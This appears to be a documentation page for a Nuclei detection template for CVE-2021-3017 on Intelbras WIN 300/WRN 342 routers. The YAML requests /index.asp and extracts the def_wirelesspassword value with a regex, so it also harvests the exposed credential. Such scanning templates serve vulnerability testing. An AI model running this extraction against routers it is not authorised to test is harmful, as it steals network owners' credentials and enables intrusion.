Intelbras WIN 300/WRN 342 - Credentials Disclosure
ID: CVE-2021-3017
Severity: high
Author: pikpikcu
Tags: cve2021,cve,exposure,router,intelbras
Description
Section titled “Description”Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code.
YAML Source
Section titled “YAML Source”id: CVE-2021-3017
info: name: Intelbras WIN 300/WRN 342 - Credentials Disclosure author: pikpikcu severity: high description: Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code. impact: | An attacker can gain unauthorized access to the router's administrative interface and potentially compromise the entire network. remediation: | Update the router firmware to the latest version, which includes a fix for the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3017 - https://pastebin.com/cTYTf0Yn - https://github.com/bigblackhat/oFx - https://github.com/openx-org/BLEN - https://github.com/Miraitowa70/POC-Notes classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-3017 epss-score: 0.01563 epss-percentile: 0.87211 cpe: cpe:2.3:h:intelbras:win_300:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelbras product: win_300 tags: cve2021,cve,exposure,router,intelbras
http: - method: GET path: - "{{BaseURL}}/index.asp"
matchers-condition: and matchers: - type: word part: body words: - 'def_wirelesspassword =' - '<title>Roteador Wireless</title>' condition: and
- type: status status: - 200
extractors: - type: regex regex: - 'def_wirelesspassword = "([A-Za-z0-9=]+)";' part: body# digest: 4a0a0047304502206a8fc0722fe9a3c61911bce464863aada1decb12d8f1e8cf031c578a4abaf89d022100b57f0affc526dfde1fa8fff627f7d0e7cfcfe6d60fb76dff6e77ee9c1fa33e5f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-3017.yaml"